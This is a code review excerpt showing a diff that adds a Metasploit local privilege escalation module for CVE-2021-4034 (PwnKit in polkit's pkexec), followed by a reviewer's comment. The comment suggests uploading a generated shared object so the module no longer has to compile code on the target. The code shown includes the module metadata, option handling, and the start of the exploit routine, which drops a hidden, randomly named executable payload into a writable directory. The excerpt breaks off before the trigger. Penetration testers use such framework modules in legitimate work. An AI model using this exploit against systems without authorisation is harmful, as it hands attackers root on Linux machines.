modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Local Privilege Escalation in polkits pkexec',
+        'Description' => %q{
+          A local privilege escalation vulnerability was found on polkit's pkexec utility.
+          The pkexec application is a setuid tool designed to allow unprivileged the
+          current version of pkexec doesn't handle the calling parameters count correctly
+          and ends trying to execute environment variables as commands.
+
+          An attacker can leverage this by crafting environment variables
+          in such a way it'll induce pkexec to execute arbitrary code. When successfully
+          executed the attack can cause a local privilege escalation given unprivileged
+          users administrative rights on the target machine.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Qualys Security', # Original vulnerability discovery
+          'Andris Raugulis', # Exploit writeup and PoC
+          'Dhiraj Mishra'    # Metasploit Module
+        ],
+        'DisclosureDate' => '2022-01-25',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2021-4034' ],
+          [ 'URL', 'https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt' ],
+          [ 'URL', 'https://github.com/arthepsy/CVE-2021-4034' ] # PoC Reference
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    upload_and_chmodx(payload_file, generate_payload_exe)
```

Comment:
This is where the shared object should be uploaded directly to remove the need for the contents of `shell` to be compiled on the remote host. The function is `generate_payload_dll` (despite actually generating a `.so` file. You can see an example in the [sudo_baron_samedit](https://github.com/rapid7/metasploit-framework/blob/58d98207f17181a2367a59440542c58a71bd3232/modules/exploits/linux/local/sudo_baron_samedit.rb#L266) exploit.